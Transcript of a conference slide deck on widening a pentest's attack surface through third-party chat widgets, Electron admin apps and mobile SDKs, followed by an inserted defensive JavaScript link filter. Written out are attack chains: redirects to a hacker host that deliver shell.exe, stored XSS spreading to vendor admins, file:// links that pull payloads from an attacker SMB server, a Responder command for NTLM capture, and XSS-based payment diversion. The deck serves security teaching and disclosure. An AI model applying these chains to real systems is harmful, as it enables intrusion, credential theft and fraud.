
Chat with a hacker

E K
November 21, 2017

A talk about 3rd party applications: how can they help us in a pentest?
Topics:
- RCE from file upload
- JavaScript implementation and privileges
- Sad consequences of a simple XSS
- Desktop applications (Electron XSS == RCE)
- RCE via the file:// scheme and tricks
- A few words about mobile applications, 3rd party SDKs and malware

Transcript

  1. Chat with a hacker
    Increase attack surface for Pentest
    A talk by Egor Karbutov and Alexey Pertsev


  2. $ Whoarewe
    • Egor Karbutov & Alexey Pertsev
    • Penetration testers @Digital Security
    • Speakers
    • Bug Hunters

  3. Agenda
    • Chats-Chats-Chats
    • How does it work?
    • ZIP old tricks
    • RCE via ZIP
    • So much XSS
    • Electron vulnerability
    • Scheme file:// for your chats
    • Payment through chats
    • Mobile Application Chats

  4. Disclaimer
    • Chat images are taken for examples
    • All coincidences are accidental

  5. Chats-Chats-Chats
    • What are you talking about?
    • Another chat?



  8. Chat Types
    • Social Networks
    • CMS
    • Desktop Application
    • Mobile SDK
    • Browsers

  9. Does it help us? Pentest!
    • Increases the attack surface
    • Social engineering attacks
    • Vulnerabilities in in-house implementations
    • Vendor vulnerabilities
    • User support sits on the local network
    • Lack of (network) segmentation

  10. Chat for browsers. How does it work?
    JavaScript
    CMS = JS

  11. JavaScript «Privileges»
    • XML HTTP Request
    • Control of user data
    • Cookie
    • Tokens
    • Sensitive information
    • HTML replace
    • Remote update

  12. Services


  15. Files
    • Social engineering attacks?
    • Will you send EXE files?
    • We can use a couple of stupid tricks with ZIP

  16. ZIP Bomb
    42 Kb → 24 Gb? 322 Gb? 132 Tb? 4.5 Pb
    Hi @sergeybelove from 2014 :)

  17. ZIP Format

  18. ZIP Traversal

  26. Let’s send a file (final state of the build-up on slides 19–26)
    Participants: User interface, Operator standalone program, api.service.test, storage.service.test
    1. Sending the file: cat.png → api.service.test, where cat.png == id
    2. File Message: file_path = "/file/id"
    3. Operator program: Concat('https://storage.service.test', file_path);
    4. Download file:
       GET /file/id HTTP/1.1
       Host: storage.service.test
    5. Saved as %Downloads%/cat.png

  35. RCE via File (final state of the build-up on slides 27–35)
    Participants: User interface, Operator standalone program, api.service.test, attacker-controlled storage.service.test.hacker.site
    1. Sending the file: cat.png
    2. File Message with an attacker-controlled path: file_path = ".hacker.site/file/id"
    3. Operator program: Concat('https://storage.service.test', file_path); → https://storage.service.test.hacker.site/file/id
    4. Download file:
       GET /file/id HTTP/1.1
       Host: storage.service.test.hacker.site
    5. Now ../../../../../../../shell.exe == id instead of cat.png == id
    6. Saved as %Downloads%/shell.exe

  36. XSS
    • XSS is the maximum impact
    • High level of message security, so look in not-obvious places:
      • Headers
      • GET/POST parameters for analytics
    • Our target is the Admin page or statistic page

  37. Headers for XSS
    • User-Agent
    • Referer
    • Cookie
    • Origin
    • Custom Headers

  38. Parameters for XSS
    • Methods
      • GET
      • POST
      • WebSocket
    Keep it simple. Use gray box analysis!

  39. Admin & Statistic Page
    • Waiting for someone to visit this page
    • Abuse of complaints/reports that administrators have to review

  40. The sad consequences
    • XSS into chat settings
    • Appearance customisation
      • Fonts
      • Labels
      • Color
      • Image
      • etc

  48. Attack scheme №1 (final state of the build-up on slides 41–48)
    Parties: Evil Hacker, pentest_client.shop.test, statistic_vendor.chat.test, admin_vendor.chat.test
    1. XSS attack on chat (pentest_client.shop.test)
    2. XSS attack on client admins (statistic_vendor.chat.test, admin_vendor.chat.test)
    3. JS code injection into chat settings
    4. XSS from any user on the site (pentest_client.shop.test)

  57. Attack scheme №2 (final state of the build-up on slides 49–57)
    Parties: Evil Hacker, chat.vendor, statistic.chat.vendor, admin.chat.vendor, and all chat client services (statistic_vendor.chat.test, admin_vendor.chat.test, chat.test)
    1. XSS attack on chat (chat.vendor)
    2. XSS attack on vendor admins (statistic.chat.vendor, admin.chat.vendor)
    3. JS code injection into chat settings
    4. XSS from any user on the site (chat.vendor)
    5. XSS from any user on chat clients (all chat client services)

  58. Electron
    • OpenSource framework to build desktop apps using HTML, CSS and JavaScript
    • Electron accomplishes this by combining Chromium and Node.js into a single runtime
    • Chat vendors use Electron for admin desktop applications

  59. Electron Threat Model
    • Electron Threat Model = Browser Threat Model
    • Untrusted content from the web
    • SOP Bypass
    • Control whether access to Node.js primitives is allowed from JavaScript
    • Potential access to Node.js primitives
    • Limited sandbox
    • XSS == RCE
    https://doyensec.com/resources/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security.pdf
    https://blog.doyensec.com/2017/08/03/electron-framework-security.html

  60. Electron sandbox bypass (Electron 1.6.7)
    • nodeIntegration = true

  61. Electron sandbox bypass
    • nodeIntegration = true
      • Misconfiguration
      • SOP bypass via presence of privileged URLs
      • Switch it to false

  62. File://
    • Typically used to retrieve files from networks and local disks
    • Vulnerabilities in the wild
      • Local File Inclusion
      • XXE
      • SSRF
    • Windows context
      • NTLM Hash Stealing
      • NTLM Relay
      • RCE

  63. Chats with File://
    • Admin desktop application for Windows
    • The file:// scheme is available
    • A file:// link is rendered as a hyperlink

  64. Chats with File://
    Flow: pentest_client.shop.test → Send file:// link (file://hacker.test/) → Admin desktop application → Send NTLM hash → Hacker SMB → Hash Cracking / SMB Relay
    • Pentest in local network
    • RCE on client device and servers
    • Weak & duplicate passwords (local services, servers, client devices)

  65. Tricks with File:// №1
    • What can we do?
    • File:// with local files
      • file://C:/Windows/System32/calc.exe
    • But we can’t use arguments
      • file://C:/Windows/System32/cmd.exe /C calc
      • Every character in a file link is part of the path
    • It is only for social engineering attacks
    • You can combine this with the dir traversal ZIP trick

  66. Tricks with File:// №2
    • File:// with executable files from the Internet (Hacker SMB server)
      • file://internet_IP/pwn.exe

  67. Chats with File://
    Flow: pentest_client.shop.test → Send file:// link to an executable file (file://hacker.test/shell.exe) → Admin desktop application → Clicking on the link → Admin OS → Download shell.exe from Hacker SMB → Executing shell.exe
    • Pentest internet service and local network
    • RCE on client device
    • Social engineering attacks + file://local_files

  68. Tricks with File:// №3
    • How to bypass the Windows alert window?
      • “This file is in a location outside your local network”
    • Easy, I’ll use local addresses
      • 10.0.0.0—10.255.255.255
      • 172.16.0.0—172.31.255.255
      • 192.168.0.0—192.168.255.255
    • No, it doesn’t work

  69. Tricks with File:// №3
    • “Local network” for Windows means servers with a NetBIOS name
    • NetBIOS name - a domain name without a dot
    • If I use the NetBIOS name “netbios” instead of a local IP, I can bypass that alert
      • file://netbios/pwn.exe
    • How?
      • Smbd (samba) server + responder -d netbios -I eth0
    • Works only in local networks

  70. Chats with File://
    • NetBIOS name trick in local network
    • Without alert window
    Flow: pentest_client.shop.test → Send file:// link to an executable file (file://netbios/pwn.exe) → Admin desktop application → Clicking on the link → Admin OS → Download shell.exe from Hacker SMB → Executing shell.exe
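The admin desktop app in slides 63–70 turned file:// links into clickable hyperlinks. As an added example that is not code from the deck, this is how a chat client can restrict which message tokens ever become links; hostnames are the deck's placeholders and the function names are assumed.

```javascript
// Added example, not code from the deck. Shows how a chat client decides
// which tokens in a message may be rendered as clickable links: only http:
// and https: survive, so file://hacker.test/shell.exe, file://netbios/pwn.exe
// and UNC paths stay inert text instead of reaching the SMB client. Hostnames
// are the deck's placeholders; function names are assumed.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Returns a normalised href when the token may become a link, else null.
function clickableHref(raw) {
  const text = String(raw).trim();
  // UNC paths (\\host\share\x) and drive paths (C:\...) are not URLs, but a
  // Windows shell opens them exactly like file:// targets, so refuse early.
  if (/^\\\\/.test(text) || /^[a-z]:[\\/]/i.test(text)) return null;
  let url;
  try {
    url = new URL(text); // throws for plain words: not a link at all
  } catch (_) {
    return null;
  }
  // url.protocol is lower-cased by the parser, so FILE:// is caught too.
  return ALLOWED_SCHEMES.has(url.protocol) ? url.href : null;
}

// Splits a message on whitespace; each token becomes a text or link part.
function linkify(message) {
  return String(message).split(/\s+/).filter(Boolean).map((token) => {
    const href = clickableHref(token);
    return href ? { type: "link", href } : { type: "text", text: token };
  });
}

// Constructed message in the style of the deck's scenario.
const SAMPLE = "help https://shop.test/faq then open file://netbios/pwn.exe";
console.log(linkify(SAMPLE).filter((p) => p.type === "link").length); // 1
```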

  71. Add payment system
    Useful?
    Be careful where you store configs!

  77. Hacker can buy IPhone for free (final state of the build-up on slides 72–77)
    Shop backend: POST /pay?params=1
    • shopId
    • customer
    • sum
    • item
    • …
    Redirect to payment page → checkURL → YES
    Evil Hacker → avisoURL → IPhone, payment: X

  78. Stealing money for hackers
    POST /pay?params=1
    • shopId
    • customer
    • sum
    • item
    • …
    Steps to take profit:
    • Register own shop with a similar name
    • Change shopId via XSS
    • Call checkURL and avisoURL as needed
    • All payments go to the hackers!
    Protection:
    • Check Yandex IPs
    • Add anti-CSRF token for the config form
    • DO NOT SHOW ANY PASSWORDS EVER

  79. Mobile Application SDK
    • Custom code for native applications
    • All code in an app runs with a single set of privileges in the mobile OS
    • 3rd party code (SDKs) therefore has full access inside your app
      • Change the user interface
      • Access to local files in the app folder
      • Access to dynamic user data
      • Change app logic (like tapjacking)
    • Vulnerabilities
      • Custom implementation
      • WebView JS manipulation (Android)
    https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/

  80. ExpensiveWall
    • ExpensiveWall is spread to different apps as an SDK called “gtk”
    • ExpensiveWall sends data about the infected device to its C&C server, including its location and unique identifiers, such as MAC and IP addresses, IMSI, and IMEI.
    • Total downloads of infected applications = 5,904,511
    https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/

  81. Don’t forget about
    • Farms that inflate application ratings
    • Dynamic code execution and code update
      • JSPatch (iOS)
      • Android Runtime
    • Legitimate ad SDKs that were vulnerable
    • Applications with fake (ad) SDKs
    • Code review of custom SDK code

  82. Conclusion
    • For pentest and red team
      • Increase your attack surface via 3rd party services and program libraries
    • For you and your project
      • Think about how much you trust other people’s implementations, applications on your devices, plugins in your programs
      • Don’t forget about code review!
    • All vulnerabilities were reported and fixed

  83. Questions? Or
    @ShikariSenpai @_p4lex
    Egor Karbutov
    Alexey Pertsev
    Special THX to @cherboff and @barracud4_